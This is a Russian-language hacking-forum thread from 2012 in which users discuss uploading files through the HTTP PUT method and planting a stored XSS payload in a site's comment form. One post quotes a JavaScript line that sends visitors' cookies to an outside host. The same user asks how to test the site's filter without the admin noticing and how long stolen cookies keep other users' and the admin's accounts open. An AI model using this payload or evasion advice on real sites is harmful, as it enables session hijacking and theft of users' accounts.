ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

15.01.2012, 14:26
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
Сообщение от Bahamut
Bahamut said:
как залить файл если работает Put Method ?
Никак, если нет обработчика.
|
|
|
|

15.01.2012, 16:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 2229
Репутация:
0
|
|
Сообщение от Ereee
Ereee said:
Никак, если нет обработчика.
а где можно про это прочитать, просто сканер говорит что залил этим методом файл
|
|
|
|

15.01.2012, 16:38
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
Сообщение от Bahamut
Bahamut said:
а где можно про это прочитать, просто сканер говорит что залил этим методом файл
Сканер говорит умеет?))) ЖеСтЬ! Эти всякие методы нужны, когда в определенную папку не пускают, например при:
..
Можно обойти авторизацию, отправив POST запрос.
|
|
|
|

15.01.2012, 19:42
|
|
Guest
Сообщений: n/a
Провел на форуме: 6075
Репутация:
0
|
|
Сообщение от None
Вставить один символ в сообщение, не вызвав подозрений, очень просто. Но делать это нужно так, чтобы сообщение не искажало вид страницы в случае наличия уязвимости.
M_script ты имеешь виду чтобы такого небыло :
Это появляется когда я в строке name пишу
img = new Image(); img.src = "http://httpz.ru/n6gmto41z00.gif?"+document.cookie;
, а вот source :
Name: test
Message: This is a test comment.
Name: img = new Image(); img.src = "http://httpz.ru/n6gmto41z00.gif?"+document.cookie;
Я как не пытался это исправить чтобы name и message были на разных строчках у меня не получилось , подскажи что нужно написать чтобы message был на строчку ниже.
Сообщение от None
Я уже писал выше, там нужно
ript>alert()
потому что вырезает только а не трогает.
trololoman96 я это понимаю , но для того чтобы узнать что вырезается а что нет мне надо попробовать ript>alert()ript> , и тогда я уже знаю что писать , но ведь когда я это пробую то в сообщении появляется слово ript> :  , и это уже вызовет у админа подозрение что здесь что то не так, правильно я думаю? Можно ли как то узнать что писать подругому , чтобы не вызвать подозрений , или все так делают и пофиг что будет и пофиг что страница искажается (как в первой части сообщения) или всетаки надо все делать акуратно ?
И еще вопрос , как xss работает? Я делаю xss и получаю куки всех зарегестрированых на сайте пользователей, теперь у меня свободный доступ к их аккаунтам . до какого времени? пока админ не прикроет дыру или пока пользователь не сменит пароль? Как это все работает? Спасибо за ответы )
|
|
|
|

15.01.2012, 22:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
В HTML:
[QUOTE="None"]
|
|
|
|

15.01.2012, 22:14
|
|
Guest
Сообщений: n/a
Провел на форуме: 6075
Репутация:
0
|
|
А если он просекет что там был скрипт который ворует куки , он может что то сделать чтобы я не зашел под админом ? Или ему этого не избежать?
|
|
|
|

15.01.2012, 22:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
Сообщение от NZT
NZT said:
А если он просекет что там был скрипт который ворует куки , он может что то сделать чтобы я не зашел под админом ? Или ему этого не избежать?
Если сайт на заказ делали и админ ничего незнает, кроме как создание/редактирование новостей, то не узнает. Если опытный тру админ, то он по ссылке не перейдет, даже если перешел перелогинится(чтоб украденные куки были негодны) и зафиксить уязвимость.
|
|
|
|

15.01.2012, 22:18
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Можно удалить сесию, (корректно выйти из админки) или удалить сесию на серваке, и ваши куки вам не помогут.
|
|
|

15.01.2012, 23:58
|
|
Guest
Сообщений: n/a
Провел на форуме: 6075
Репутация:
0
|
|
Понял. Большое спасибо за ответы.
|
|
|
|

16.01.2012, 15:44
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
права в папке есть, на правку, залив
но почему-то ничего не льется и не редактируется
сервер виндосовский
2ereee, это уже другой
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|